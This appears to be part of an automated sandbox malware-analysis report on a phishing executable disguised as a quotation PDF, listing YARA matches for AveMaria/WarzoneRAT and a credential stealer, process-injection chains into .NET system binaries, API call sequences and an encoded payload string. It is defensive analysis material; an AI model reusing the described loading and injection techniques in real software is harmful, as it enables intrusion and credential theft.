                  Source: 25.2.donexx.exe.3aef7b0.17.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                  Source: 25.2.donexx.exe.3aef7b0.17.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 25.2.donexx.exe.3aef7b0.17.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                  Source: 25.2.donexx.exe.3aef7b0.17.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                  Source: 25.2.donexx.exe.2b95e08.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                  Source: 25.2.donexx.exe.2b95e08.9.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 25.2.donexx.exe.2b95e08.9.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 25.2.donexx.exe.2b95e08.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                  Source: 25.2.donexx.exe.2b95e08.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                  Source: 25.2.donexx.exe.2b90e08.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                  Source: 25.2.donexx.exe.2b90e08.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 25.2.donexx.exe.2b90e08.0.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 25.2.donexx.exe.2b90e08.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                  Source: 25.2.donexx.exe.2b90e08.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                  Source: 33.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                  Source: 33.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 33.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 33.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                  Source: 33.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                  Source: 00000019.00000002.408924727.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                  Source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                  Source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
                  Source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
                  Source: 00000019.00000002.408610902.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 004036F7 appears 72 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 0040357C appears 31 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00411E88 appears 49 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_0040EDA9 GetCurrentProcess,NtQueryInformationProcess,33_2_0040EDA9
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311326145.0000000005450000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002C2A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWxlgipwjj.dll" vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311250060.00000000050B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310399282.0000000000D3B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003C3F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename01533a75-79e9-4266-ae32-2ec7bd6b33c6.exe4 vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003C3F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWxlgipwjj.dll" vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002B21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002B21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename01533a75-79e9-4266-ae32-2ec7bd6b33c6.exe4 vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeBinary or memory string: OriginalFilenameJfnflrtgza.exe> vs QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.log
                  Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@20/4@2/3
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeFile read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_0040D33C OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,33_2_0040D33C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_00415169 LoadResource,SizeofResource,LockResource,GetTempPathA,GetTempPathA,lstrcatA,lstrcatA,GetTempPathA,lstrcatA,CreateFileA,WriteFile,CloseHandle,wsprintfA,ShellExecuteExA,33_2_00415169
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile created: C:\Program Files\Microsoft DN1
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeReversingLabs: Detection: 44%
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeVirustotal: Detection: 46%
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: unknownProcess created: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AA65DD7C-83AC-48C0-A6FD-9B61FEBF8800}
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess created: C:\Users\user\AppData\Local\Temp\donexx.exe "C:\Users\user\AppData\Local\Temp\donexx.exe"
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Fhzejfh.exe "C:\Users\user\AppData\Roaming\Fhzejfh.exe"
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_00410B38 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,33_2_00410B38
                  Source: C:\Windows\System32\dllhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile created: C:\Users\user\AppData\Local\Temp\donexx.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_004148B6 CoInitialize,CoCreateInstance,VariantInit,CoUninitialize,33_2_004148B6
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\75b341f10c9579cbe1059d18f6f3b27b\mscorlib.ni.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\75b341f10c9579cbe1059d18f6f3b27b\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\Temp\donexx.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\75b341f10c9579cbe1059d18f6f3b27b\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Roaming\Fhzejfh.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\75b341f10c9579cbe1059d18f6f3b27b\mscorlib.ni.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_0041405F RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,33_2_0041405F
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, -.csBase64 encoded string: 'Q24XgCHiPkUBkijqc2MNmyqhUWQXkSntfG5fsyH7VXkQhj3OY2QBmSbjaSwDkTDQVmIImArufXJfmzTQWXkBhTHufH4QjX/odWM7uCHhd2MMzwPqZEMdhCHJYngJvCXhdHsBzyPqZEgqlSnqK14KkCH3X3FfpiHudEQQhi3hdywlkCC0d3IQqxTgY34QnSvhK3ABgBvMZWUWkSr7VHgJlS3hK0QBgADuZHZfxny8KCJftTf8dXoGmD3cdWUSkTa0Q34JhCjqUWQXkSntfG4hjDTjf2UBhn/tcXUBmDLiK2QJmy/qZHIXgA=='
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6904:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:632:120:WilError_01
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, -.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack, DHw.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack, udGXG7eTWZ.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack, xcV8Zkq.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack, w2DT39oPNEB.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack, ChR.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack, aN5K.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack, os6BNI0pSpd.csCryptographic APIs: 'TransformFinalBlock'
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeDirectory created: C:\Program Files\Microsoft DN1
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: donexx.exe, 00000019.00000002.408924727.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: donexx.exe, 00000019.00000002.408924727.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311326145.0000000005450000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B29000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408924727.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, Fhzejfh.exe, 00000024.00000002.472719163.00000000029F4000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: aspnet_compiler.pdb source: aspnet_compiler.exe, 00000021.00000002.472145644.00000000035BB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311326145.0000000005450000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002DE0000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B79000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.311069097.0000000003B29000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, 00000000.00000002.310866427.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408924727.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, donexx.exe, 00000019.00000002.408610902.0000000002D04000.00000004.00000800.00020000.00000000.sdmp, Fhzejfh.exe, 00000024.00000002.472719163.00000000029F4000.00000004.00000800.00020000.00000000.sdmp

                  Data Obfuscation

                  Source: Yara matchFile source: Process Memory Space: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe PID: 6840, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: donexx.exe PID: 6436, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Fhzejfh.exe PID: 5712, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: Fhzejfh.exe PID: 5620, type: MEMORYSTR
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, -.cs.Net Code: _E002 System.Reflection.Assembly.Load(byte[])
                  Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.5450000.18.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.5450000.18.raw.unpack, ListDecorator.cs.Net Code: Read
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.5450000.18.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.5450000.18.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.5450000.18.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3b29550.11.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3b29550.11.raw.unpack, ListDecorator.cs.Net Code: Read
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3b29550.11.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3b29550.11.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3b29550.11.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.53b0000.16.raw.unpack, --.cs.Net Code: _0003 System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.53b0000.16.raw.unpack, --.cs.Net Code: _0003 System.AppDomain.Load(byte[])
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.53b0000.16.raw.unpack, --.cs.Net Code: _0003 System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3b79570.9.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3b79570.9.raw.unpack, ListDecorator.cs.Net Code: Read
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3b79570.9.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3b79570.9.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3b79570.9.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 24_2_0AB0BAA8 pushfd ; iretd 24_2_0AB0BAA9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_004011C0 push eax; ret 33_2_004011D4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_004011C0 push eax; ret 33_2_004011FC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 33_2_0041C225 pushad ; retn 0041h33_2_0041C22D
